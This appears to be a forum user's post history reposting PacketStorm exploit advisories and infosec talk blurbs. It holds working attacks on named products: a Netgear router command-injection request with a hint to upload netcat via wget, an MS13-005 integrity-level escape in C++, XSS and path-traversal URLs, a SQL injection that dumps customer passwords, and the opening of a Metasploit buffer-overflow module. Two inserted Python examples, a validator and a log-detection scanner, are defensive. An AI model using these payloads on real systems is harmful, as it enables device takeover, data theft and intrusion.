
Praetorian503
Everything posted by Praetorian503
-
The Netgear N150 Wireless ADSL2+ Modem Router DGN1000 suffers from cross site scripting, OS command injection, and insecure cryptographic storage vulnerabilities. Firmware versions 1.1.00.24 and 1.1.00.45 are affected.

Device Name: DGN1000B
Vendor: Netgear

============
Vulnerable Firmware Releases:
============
Firmware version: V1.1.00.24
Firmware version: V1.1.00.45
Download: http://downloadcenter.netgear.com/de/product/DGN1000

============
Device Description:
============
The N150 Wireless ADSL2+ Modem Router DGN1000 provides you with an easy and secure way to set up a wireless home network with fast access to the Internet over a high-speed digital subscriber line (DSL). The N150 Modem Router has a built-in DSL modem and is compatible with all major DSL Internet service providers. The security features let you block unsafe Internet content and applications, and protect the devices that you connect to your home network.
Source: http://support.netgear.com/product/DGN1000

============
Shodan Dorks
============
Shodan Search: NETGEAR DGN1000

============
Vulnerability Overview:
============

* OS Command Injection in the UPNP configuration:

The vulnerability is caused by missing input validation in the TimeToLive parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to upload and execute a backdoor to compromise the device.

Param: TimeToLive

POST /setup.cgi HTTP/1.1
Host: 192.168.178.188
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.188/setup.cgi?next_file=upnp.htm
Authorization: Basic XXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 185
Connection: close

UPnP=UPnP&AdverTime=30&TimeToLive=`%20COMMAND%20`&save=+Anwenden&todo=save&this_file=upnp.htm&next_file=upnp.htm&h_UPnP=enable&hiddenAdverTime=30&hiddenTimeToLive=4

Change the request method from HTTP POST to HTTP GET:

http://192.168.178.188/setup.cgi?UPnP=UPnP&AdverTime=30&TimeToLive=`%20COMMAND%20`&save=+Anwenden&todo=save&this_file=upnp.htm&next_file=upnp.htm&h_UPnP=enable&hiddenAdverTime=30&hiddenTimeToLive=4

It is possible to cross compile Netcat and upload it via wget, adjust the permissions and execute it. Have phun

Sources including needed toolchain: http://kb.netgear.com/app/answers/detail/a_id/2649
direct download: http://www.downloads.netgear.com/files/GPL/DGN1000B_VB1.00.45_GR_src.tar...

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN1000B-os-command-wget-check.png
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN1000B-r00ted.png

* Insecure Cryptographic Storage:

There is no password hashing implemented and so it is saved in plain text on the system:

cat /tmp/etc/htpasswd
admin:password

* XSS

Injecting scripts into the following parameters reveals that these parameters are not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

-> Security -> Services -> create new service -> Service name (German UI path: Sicherheit -> Dienste -> neuen Dienst anlegen -> Dienstname)
Param: service_name
http://192.168.178.188/setup.cgi?service_name=%22%3E%3Cimg%20src=%220%22%20onerror=alert%282%29%3E&svc_type=tcp&serv_sport=1&serv_endport=2&save=Anwenden&todo=save&h_svc_type=tcp&edit=1&h_ruleSelect=0&this_file=servinfo.htm&next_file=fw_serv.htm

-> Wireless -> edit access list -> Add -> Device name (German UI path: WLAN -> Zugriffsliste anpassen -> Hinzufügen -> Gerätename)
Param: device
http://192.168.178.188/setup.cgi?accessLimit=accessLimit&device=%22%3E%3Cimg+src%3D%220%22+onerror=alert(2)>&wirelist_mac=01-11-22-33-44-66&h_accessLimit=enable&h_ruleSelect=0&todo=addmanual&this_file=m_access.htm&next_file=m_access.htm

Param: ssid_num
http://192.168.178.188/setup.cgi?next_file=adv_wireless.htm&ssid_num=a%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&flag=1

Param: h_skeyword
http://192.168.178.188/setup.cgi?skeyword=1&cfKeyWord_Domain=&KeyWordList=0&todo=delete&this_file=keyword.htm&next_file=keyword.htm&h_skeyword=115bcf%22%3E%3Cscript%3Ealert%281%29%3C/script%3Edc575b170bc38bebe&h_KeyWordList=&h_ruleSelect=0&h_trustipenable=disable&c4_Trusted_IPAddress=

Param: cfKeyWord_Domain
http://192.168.178.188/setup.cgi?skeyword=1&cfKeyWord_Domain=5d0a9%3Cscript%3Ealert%281%29%3C/script%3E&todo=addkeyword&this_file=keyword.htm&next_file=keyword.htm&h_skeyword=1&h_KeyWordList=&h_ruleSelect=&h_trustipenable=disable&c4_Trusted_IPAddress=

============
Solution
============
No known solution available.

============
Credits
============
The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-005
Twitter: @s3cur1ty_de

============
Time Line:
============
October 2012 - discovered vulnerability
15.10.2012 - Privately reported all details to vendor via email
23.10.2012 - Privately reported all details to vendor via webinterface
24.10.2012 - Netgear replied to forward the details internally
31.10.2012 - Netgear closes the case
31.10.2012 - Requested more details why the case is now closed.
31.10.2012 - Netgear responded that they will check the state of the case
06.11.2012 - Netgear requested the Serial Number of the device
08.11.2012 - Responded with the Serial Number
13.11.2012 - something goes on - I got a product registration confirmation
03.12.2012 - Case closed by Netgear - No new firmware available
16.01.2013 - Netgear contacted me again requesting to check a Beta version
22.01.2013 - Tested Beta Firmware and gave feedback to vendor
06.02.2013 - public release

=====================
Advisory end
=====================

Source: PacketStorm
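Hardened server-side handling of the two weaknesses the advisory reports in setup.cgi, as an added example in Python (not the DGN1000 firmware's own code): TimeToLive is accepted only as a plain integer and passed to the UPnP daemon as an argv list that no shell ever parses, and the htpasswd entry becomes a salted PBKDF2 record instead of plain text. The daemon name `upnpd` and its `--ttl` option are assumptions made for the example.

```python
import hashlib
import hmac
import os
from urllib.parse import parse_qs

# Constructed copy of the POST body quoted in the advisory, with the COMMAND
# placeholder left as it appears there, plus a benign variant of the same form.
INJECTED_BODY = ("UPnP=UPnP&AdverTime=30&TimeToLive=`%20COMMAND%20`&save=+Anwenden"
                 "&todo=save&this_file=upnp.htm&next_file=upnp.htm&h_UPnP=enable"
                 "&hiddenAdverTime=30&hiddenTimeToLive=4")
CLEAN_BODY = INJECTED_BODY.replace("`%20COMMAND%20`", "4")


class InvalidParameter(ValueError):
    """Raised when a form field does not have the strict shape we expect."""


def parse_time_to_live(raw):
    """Accept only a plain decimal integer in the UPnP multicast TTL range 1..255.

    Backticks, spaces, signs, hex digits or an empty value are rejected before
    the string can reach a shell or a config file.
    """
    if not (raw.isascii() and raw.isdigit() and 1 <= len(raw) <= 3):
        raise InvalidParameter(f"TimeToLive must be 1-3 digits, got {raw!r}")
    ttl = int(raw)
    if not 1 <= ttl <= 255:
        raise InvalidParameter(f"TimeToLive out of range: {ttl}")
    return ttl


def upnp_argv(ttl):
    """Argument vector to hand to exec() directly, so no shell interprets it.

    'upnpd' and '--ttl' are assumed names for illustration, not the firmware's.
    """
    return ["upnpd", "--ttl", str(ttl)]


def handle_upnp_save(body):
    """Replacement for the setup.cgi UPnP save path: validate, then build argv."""
    form = parse_qs(body, keep_blank_values=True)
    raw = form.get("TimeToLive", [""])[0]
    return upnp_argv(parse_time_to_live(raw))


def is_rejected(body):
    """True when the validator refuses the form body."""
    try:
        handle_upnp_save(body)
    except InvalidParameter:
        return True
    return False


def hash_password(password, salt=None, iterations=200_000):
    """Salted PBKDF2-HMAC-SHA256 record to store in htpasswd instead of plain text."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"$pbkdf2-sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, record):
    """Constant-time comparison of a candidate password against a stored record."""
    _, algo, iters, salt_hex, dk_hex = record.split("$")
    if algo != "pbkdf2-sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("clean body ->", handle_upnp_save(CLEAN_BODY))
    print("advisory body rejected:", is_rejected(INJECTED_BODY))
    rec = hash_password("password")
    print("admin:" + rec)
    print("verify:", verify_password("password", rec), verify_password("wrong", rec))
```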
-
MS13-005 proof of concept exploit to drive a medium IL cmd.exe via a low IL process and message broadcasted.

```cpp
/*
    ms13-005-funz-poc.cpp - Drive a Medium IL cmd.exe via a Low IL process and message broadcasted
    Copyright (C) 2012 Axel "0vercl0k" Souchet - http://www.twitter.com/0vercl0k

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program. If not, see <http://www.gnu.org/licenses/>.

    @taviso did all the job, I just followed its blogpost:
    -> http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html -- amazing.

    Cool trick:
    -> If you want to set this process to a low IL you can use: icacls ms13-005-funz-poc.exe /setintegritylevel L
    -> The new ms13-005-funz-poc.exe will be now launched as low IL (you can check it with process explorer)
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>  // EXIT_SUCCESS
#include <string.h>  // strlen

int main()
{
    STARTUPINFO si = {0};
    PROCESS_INFORMATION pi = {0};

    // Lines typed, one character at a time, into whichever console window receives the broadcast
    PCHAR payload[] = {
        "echo \".___ _____ ______________ ______________ \"> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"| | / \\ \\__ ___/ | \\_ _____/ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"| |/ \\ / \\ | | / ~ \\ __)_ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"| / Y \\ | | \\ Y / \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"|___\\____|__ / |____| \\___|_ /_______ / \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \" \\/ \\/ \\/ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \" _______ .___ ________ ________ _____ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \" \\ \\ | |/ _____/ / _____/ / _ \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \" / | \\| / \\ ___/ \\ ___ / /_\\ \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"/ | \\ \\ \\_\\ \\ \\_\\ \\/ | \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \"\\____|__ /___|\\______ /\\______ /\\____|__ / \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "echo \" \\/ \\/ \\/ \\/ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
        "exit",
        NULL
    };

    printf("1] Spawning a low IL cmd.exe (from a low IL process)..Rdy ? Press to continue\n");
    getchar();

    si.cb = sizeof(si);
    CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
    Sleep(1000);

    // Yeah, you can "bruteforce" the index of the window..
    printf("2] Use Win+Shift+7 to ask explorer.exe to spawn a cmd.exe MI..");
    keybd_event(VK_LWIN, 0x5B, 0, 0);
    keybd_event(VK_LSHIFT, 0xAA, 0, 0);
    keybd_event(0x37, 0x87, 0, 0);
    keybd_event(VK_LWIN, 0x5B, KEYEVENTF_KEYUP, 0);
    keybd_event(VK_LSHIFT, 0xAA, KEYEVENTF_KEYUP, 0);
    keybd_event(0x37, 0x87, KEYEVENTF_KEYUP, 0);
    Sleep(1000);

    printf("3] Killing now the useless low IL cmd.exe..\n");
    TerminateProcess(pi.hProcess, 1337);

    printf("4] Now driving the medium IL cmd.exe with SendMessage and HWND_BROADCAST (WM_CHAR)\n");
    printf("   \"Drive the command prompt [..] to make it look like a scene from a Hollywood movie.\" <- That's what we're going to do!\n");

    for (unsigned int i = 0; payload[i] != NULL; ++i)
    {
        for (unsigned int j = 0; j < strlen(payload[i]); ++j)
        {
            // Yeah, that's the fun part to watch ;D
            Sleep(10);
            SendMessage(HWND_BROADCAST, WM_CHAR, payload[i][j], 0);
        }
        SendMessage(HWND_BROADCAST, WM_CHAR, VK_RETURN, 0);
    }

    return EXIT_SUCCESS;
}
```

Source: PacketStorm
-
WordPress Audio Player versions prior to 2.0.4.6 suffer from a cross site scripting vulnerability in player.swf.

# Exploit Title: Wordpress Audio Player Plugin XSS in SWF
# Release Date: 31/01/13
# Author: hip [Insight-Labs]
# Contact: hip@insight-labs.org | Website: http://insight-labs.org
# Software Link: http://downloads.wordpress.org/plugin/audio-player.2.0.4.6.zip
# Vendor Homepage: http://wpaudioplayer.com/
# Tested on: XPsp3
# Affected version: before 2.0.4.6
# Google Dork: inurl:/wp-content/plugins/audio-player/
# Ref: CVE-2013-1464
-------------------------------------------------------------------------------
# Introduction:
Audio Player is a highly configurable but simple mp3 player for all your audio needs.
-------------------------------------------------------------------------------
# XSS - Proof Of Concept:
vulnerable path: /wp-content/plugins/audio-player/assets/player.swf
vulnerable parameter: playerID
POC: /wp-content/plugins/audio-player/assets/player.swf?playerID=a\"))}catch(e){alert(1)}//
-------------------------------------------------------------------------------
------------
Patch:
------------
-- Vendor was notified on 23/01/2013
-- Vendor released version 2.0.4.6 on 30/01/2013, which fixed the bug
-------------------------------------------------------------------------------
Source: PacketStorm
-
Description: Frequently people consider a serial number as nothing but a number, but in this presentation you will be shown the multitude of ways in which an attacker could utilize serial numbers to hurt you, to hurt companies, as well as to track your movements. A brief primer on the function and use of serial numbers in the real world will be provided, focusing on Apple, Amazon and Pringles and providing in-depth insight into the varying degrees of trust a serial number will gain you. Attack vectors ranging from Apple to Pringles and everywhere in between are covered, along with points about how to prevent similar tragedies from occurring with your product.

Darkred is a high-school student currently residing in the United States. In his free time, he enjoys testing the vulnerabilities of companies' security and warranty policies. He does this in order to make said companies aware of serious flaws in their policies. His tests range from High Value Electronics to free coupons for soda and chips. With this information, he hopes that big companies like Apple can protect their warranty policies and their consumers.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Source: Target Attacks On Warranties For Fun And Profit
-
Description: Walk into Starbucks, plop down a laptop, click start, watch the credentials roll in. Enter Subterfuge, a Framework to take the arcane art of Man-in-the-Middle Attacks and make it as simple as point and shoot. Subterfuge demonstrates vulnerabilities in the ARP Protocol by harvesting credentials that go across the network, and even exploiting machines through race conditions. Now walk into a corporation...

A rapidly-expanding portion of today's Internet strives to increase personal efficiency by turning tedious or complex processes into a framework which provides instantaneous results. On the contrary, much of the information security community still finds itself performing manual, complicated tasks to administer and protect their computer networks. The purpose of this presentation is to discuss a new Man-In-The-Middle attack tool called Subterfuge. Subterfuge is a simple but devastatingly effective credential-harvesting program, which exploits vulnerabilities in the inherently trusting Address Resolution Protocol. It does this in a way that even a non-technical user would have the ability, at the push of a button, to attack all machines connected to the network. Subterfuge further provides the framework by which users can then leverage a MITM attack to do anything from browser/service exploitation to credential harvesting, thus equipping information and network security professionals and enthusiasts alike with a sleek "push-button" security validation tool.

Matthew M. Toussain developed the Air Force's introductory Cyber Warfare curriculum at the United States Air Force Academy, promoting information assurance through a ten day, fast-paced, offense focused program. As a senior at the Academy he participates in national and international cyber competitions with the AF Academy's Cyber Competition Team.
Twitter: @0sm0s1z
Facebook: mtoussain
subterfuge - Automated Man-in-the-Middle Attack Framework - Google Project Hosting

Christopher Shields, Lieutenant in the United States Air Force, was the first-ever Cyber Commander pioneering the United States Air Force Academy's intensive summer curriculum. As an integral four-year member of the Academy's internationally-recognized Cyber Warfare Competition Team, he drove their 2012 Cyber Defense Exercise win, hosted by the NSA, and their second place finish at the 2012 National Collegiate Cyber Defense Competition. A Cyberspace Operations Officer, Lieutenant Shields holds a Computer Science-Cyber Warfare degree. His growing experience and interest includes network penetration testing, network mapping and enumeration, intrusion detection, exploitation and persistence, and security research.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Source: Subterfuge: The Automated Man-In-The-Middle Attack Framework
-
Description: The precursor to cracking any password is getting the right hash. In this talk we are going to cover how we discovered that Cain and Abel, Creddump, Metasploit and other hash extraction tools regularly yield corrupt hashes that cannot be cracked. We will take a deep dive into password extraction mechanics, the birth of a viral logic flaw that started it all and how to prevent corrupt hashes. At the conclusion of this talk we will release patches that prevent hash corruption in these tools that many security professionals use every day.

Ryan Reynolds has been with Crowe for five years and is the Manager responsible for Crowe's Penetration Testing services. Ryan has a wide range of knowledge and experience in system administration and networking, including security applications and controls. He is a technical lead for engagements including application, network and infrastructure penetration testing on both internal and external systems as well as social engineering and physical security assessments.
Twitter: @reynoldsrb

Jonathan Claudius is a Security Researcher at Trustwave. He is a member of Trustwave's SpiderLabs, the advanced security team focused on penetration testing, incident response, and application security. He has ten years of experience in the IT industry with the last eight years specializing in Security. At Trustwave, Jonathan works in the SpiderLabs Research Division where he focuses on vulnerability research and network exploitation, and is the creator of the BNAT-Suite. Before joining SpiderLabs, Jonathan ran Trustwave's Global Security Operations Center.
Twitter: @claudijd

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Source: Stamp Out Hash Corruption! Crack All The Things!
-
Description: In 2011, SQL injections became front page news as ever more high profile companies were victims of automated SQL injection attacks. Responders spent countless hours looking at values in log files like "0x31303235343830303536" trying to figure out what was being exfiltrated by whom. Incident response costs skyrocketed while the cost of attacking fell. This presentation will debut SQL ReInjector, a tool for the rapid assessment of logs from SQL injection attacks to determine what data was exfiltrated.

When responding to an SQL injection attack, responders have to determine what was exfiltrated by manually parsing the web server logs from the victimized host. This is a time consuming process that requires a significant amount of a responder's time. Moreover, manual replay of the SQL injection does not account for system level discrepancies in how queries are executed by the system: running SQL against a SQL server directly doesn't account for the behavior of any intermediary systems, e.g. any application layer logic or nuances in how the web application and database server interact. SQL ReInjector uses the log files from the machine that has been subject to a SQL injection attack to replay the attack against the server (or a virtualized forensic image thereof) and captures the data returned by the SQL injection web site requests, reducing the amount of time responders have to spend looking at web server logs and allowing responders to recreate the data exfiltrated through a SQL injection attack.

Jason A. Novak is an Assistant Director of Digital Forensics in Stroz Friedberg's Chicago office. At Stroz Friedberg, Mr. Novak has been lead examiner in a wide range of cases involving digital forensics, incident response, application testing, source code analysis, and data analytics, and has developed numerous tools to expedite the firm's analysis and response capabilities. The proprietary tools developed by Mr. Novak have included: an anti-money laundering data analytics platform and tools to process electronically stored information to respond to forensic and electronic discovery requests. As a co-writer of the Google Street View report, Mr. Novak analyzed the source code to gstumbler, the WiFi device geolocation application used by Google as part of the Street View project, and documented its structure and functionality in a publicly released report; Mr. Novak has responded to inquiries about the report from domestic and foreign regulators.
Twitter: @strozfriedberg
STROZ FRIEDBERG LLC | Digital Risk Management & Investigations

Andrea (Drea) London is a Digital Forensic Examiner in Stroz Friedberg's Dallas office. At Stroz Friedberg, Ms. London acquires and examines digital evidence from laptops, desktops and mobile phones in support of legal proceedings, criminal matters, and/or corporate investigations. Additionally she is responsible for implementing large-scale, end-to-end electronic discovery for both civil and criminal litigation. Ms. London previously held positions at Arsenal Security Group and IBM's Internet Security Systems Emergency Response Team. At Arsenal, Ms. London was an integral part of the company's immediate response team for worldwide cyber security incidents. During this time she completed and has maintained certification as a Payment Application Qualified Security Assessor (PA QSA), Payment Card Industry (PCI QSA), and PCI Forensic Investigator (PFI), one of the first appointed by the PCI Council. At IBM, she acted as an official Quality Incident Response Assessor (QIRA) reporting PCI breaches to major card brands. Prior to her work for IBM, Ms. London was with the Air Force Office of Special Investigations (AFOSI), where she was one of two Airmen chosen for special duty assignment at the Defense Cyber Crime Center, and where she was tasked with testing and evaluating forensic software and hardware for the Center.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Source: Sql Reinjector - Automated Exfiltrated Data Identification
-
Description: I can help you with Step 1. In this talk, I'll describe several 0-day vulnerabilities in Netgear wireless routers. I'll show you how to exploit an unexposed buffer overflow using nothing but a SQL injection and your bare hands. Additionally, I'll show how to use the same SQL injection to extract arbitrary files from the file systems of the wifi routers. This presentation guides the audience through the vulnerability discovery and exploitation process, concluding with a live demonstration. In the course of describing several vulnerabilities, I present effective investigation and exploitation techniques of interest to anyone analyzing SOHO routers and other embedded devices.

Zachary Cutlip is a security researcher with Tactical Network Solutions, in Columbia, MD. At TNS, Zach develops exploitation techniques targeting embedded systems and network infrastructure. Since 2003, Zach has worked either directly for or with the National Security Agency in various capacities. Before becoming a slacker, he spent six years in the US Air Force, parting ways at the rank of Captain. Zach holds an undergraduate degree from Texas A&M University and a master's degree from Johns Hopkins University.
Twitter: @zcutlip

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Source: Sql Injection To Mips Overflows: Rooting Soho Routers
-
Easy Live Shop System suffers from a remote SQL injection vulnerability.

+--------------------------------------------------
| Easy Live Shop System SQL Injection Vulnerability
| By cr4wl3r http://bastardlabs.info
| http://bastardlabs.info/news/?id=85
| Link : http://www.media-products.de/easy-live-shop-system-p-840.html
| Demo : http://www.media-products-demoserver.de/ph414/
| Tested : Win 7
+--------------------------------------------------

Poc : http://bastardlabs/[path]/index.php?seite=17&aid=[SQLi]

Example : index.php?seite=17&aid=NULL/**/UNION/**/SELECT/**/NULL,CONCAT(CHAR(61),CHAR(61),CHAR(123),CHAR(123),CHAR(123),name,0x7c,0x7c,Email,0x7c,0x7c,Passwort,CHAR(125),CHAR(125),CHAR(125),CHAR(125),0x7c),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/LS_Kunden

Source: PacketStorm
-
SiteGo suffers from cross site scripting and local file inclusion vulnerabilities.

#################################################
### Exploit Title: SiteGo Multiple Vulnerabilities
### Date: 02/07/2013
### Author: L0n3ly-H34rT
### Contact: l0n3ly_h34rt@hotmail.com
### My Site: http://se3c.blogspot.com/
### Vendor Link: http://site-go.com/
### Software Link: http://site-go.com/free/site-go.zip
### Tested on: Linux/Windows
#################################################

# Multiple Local File Inclusion :

http://127.0.0.1/site-go/admin/extra/contacts/DownloadMailAttach.php?file=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/StyleManager/EditFile.php?OpenFolder=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/edit_config/index.php?idc=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/visitors/index.php?idv=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/stylemanager/index.php?ids=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/site_reports/index.php?idc=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/my_tools/index.php?idt=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/my_account/index.php?idm=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/mysql/index.php?idm=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/moderators/index.php?idm=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/mainlinks/index.php?idl=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/linksmanager/index.php?idl=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/ipdenymanager/index.php?idm=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/filesmanager/index.php?idf=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/feedout/index.php?idf=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/contacts/index.php?idc=../../../../../../../../../../windows/win.ini%00
http://127.0.0.1/site-go/admin/extra/backup/index.php?idb=../../../../../../../../../../windows/win.ini%00

Also inject the cookie on the main page with this:
style_name=../../../../../../../../../../windows/win.ini%00

# XSS :

http://127.0.0.1/site-go/?action=vote&Browse=[XSS]
http://127.0.0.1/site-go/?action=MailList&articles=&B1=ãÊÇÈÚÉ&delete=[XSS]&reason=1

Many files are affected.

#######################################################
# Notes :
1- Must be magic_quotes_gpc = Off
2- phpinfo() : http://127.0.0.1/site-go/admin/include/phpinfo.php
3- Remote File Inclusion is not fixed yet! : http://www.exploit-db.com/exploits/21222/

Source: PacketStorm
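Detection logic for the request patterns quoted in the Netgear DGN1000, Easy Live Shop and SiteGo advisories above, as an added example in Python that is not part of any of those advisories: every query parameter of each logged request is decoded and checked for shell metacharacters, comment-obfuscated UNION SELECT, ../ traversal, null bytes and inline markup. The log lines are constructed from the advisories' own URLs; the client IPs, timestamps, the two benign requests and the rule names are my choices.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log in Apache common log format. The request targets are the
# proof-of-concept URLs from the three advisories; everything else is made up.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Feb/2013:10:00:01 +0100] "GET /setup.cgi?UPnP=UPnP&AdverTime=30&TimeToLive=`%20COMMAND%20`&save=+Anwenden&todo=save&this_file=upnp.htm&next_file=upnp.htm HTTP/1.1" 200 512
10.0.0.5 - - [07/Feb/2013:10:00:02 +0100] "GET /setup.cgi?accessLimit=accessLimit&device=%22%3E%3Cimg+src%3D%220%22+onerror=alert(2)>&wirelist_mac=01-11-22-33-44-66&todo=addmanual HTTP/1.1" 200 512
10.0.0.7 - - [07/Feb/2013:10:01:00 +0100] "GET /index.php?seite=17&aid=NULL/**/UNION/**/SELECT/**/NULL,CONCAT(CHAR(61),name,0x7c,Passwort),NULL/**/FROM/**/LS_Kunden HTTP/1.1" 200 2048
10.0.0.9 - - [07/Feb/2013:10:02:00 +0100] "GET /site-go/admin/extra/contacts/DownloadMailAttach.php?file=../../../../../../../../../../windows/win.ini%00 HTTP/1.1" 200 300
10.0.0.2 - - [07/Feb/2013:10:03:00 +0100] "GET /setup.cgi?next_file=upnp.htm HTTP/1.1" 200 4096
10.0.0.2 - - [07/Feb/2013:10:03:05 +0100] "GET /index.php?seite=17&aid=42 HTTP/1.1" 200 1024
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Each rule is applied to the *decoded* value of every query parameter, so that
# %20, %22 and %00 are inspected as the application itself would see them.
RULES = {
    "shell-metachar": re.compile(r"[`;|&$]"),                       # backtick injection in TimeToLive
    "sql-union":      re.compile(r"union(?:\s|/\*.*?\*/)+select", re.I),  # /**/ used as whitespace
    "path-traversal": re.compile(r"(?:\.\./){2,}"),
    "null-byte":      re.compile("\x00"),                           # %00 truncation of the include path
    "xss-markup":     re.compile(r"<\s*(?:script|img|svg|iframe)\b|\bon[a-z]+\s*=", re.I),
}


def parse_log_line(line):
    """Split one common-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_request(target):
    """Return the sorted names of the rules that fire on any decoded query value."""
    query = urlsplit(target).query
    hits = set()
    for _name, value in parse_qsl(query, keep_blank_values=True):
        for rule, rx in RULES.items():
            if rx.search(value):
                hits.add(rule)
    return sorted(hits)


def scan(log_text):
    """Return (client ip, request path, rule names) for every request that trips a rule."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_log_line(line)
        if rec is None:
            continue
        tags = classify_request(rec["target"])
        if tags:
            findings.append((rec["ip"], urlsplit(rec["target"]).path, tags))
    return findings


if __name__ == "__main__":
    for ip, path, tags in scan(SAMPLE_LOG):
        print(f"{ip:12} {path:55} {','.join(tags)}")
```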
-
This Metasploit module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW Server can be used to transfer fax messages to the fax server without any underlying protocols. To note significant fields in the fax being transferred, like fax number and recipient, you can use ActFax data fields. @F506, @F605, and @F000 are all data fields that are vulnerable. This has been fixed in a beta version which will not be pushed to release until May 2013.

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ActFax 5.01 RAW Server Buffer Overflow',
      'Description'    => %q{
          This module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW Server
        can be used to transfer fax messages to the fax server without any underlying protocols.
        To note significant fields in the fax being transferred, like fax number and recipient,
        you can use ActFax data fields. @F506, @F605, and @F000 are all data fields that are
        vulnerable. For more information refer to the 'data fields' section of the help menu in
        ActFax. This has been fixed in a beta version which won't be pushed to release until
        May 2013. Beta is here: http://www.actfax.com/download/beta/actfax_setup_en.exe
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Craig Freyman @cd1zz', # discovery and msf
          'corelanc0d3r',         # lots of help with getpc routine => https://www.corelan-training.com/index.php/training/corelan-live
        ],
      'References'     =>
        [
          [ 'OSVDB', '' ],
          [ 'CVE', '' ],
          [ 'URL', 'http://www.pwnag3.com/2013/02/actfax-raw-server-exploit.html' ]
        ],
      'DefaultOptions' =>
        {
          'ExitFunction'         => 'none',
          'InitialAutoRunScript' => 'migrate -f',
        },
      'Platform'       => 'win',
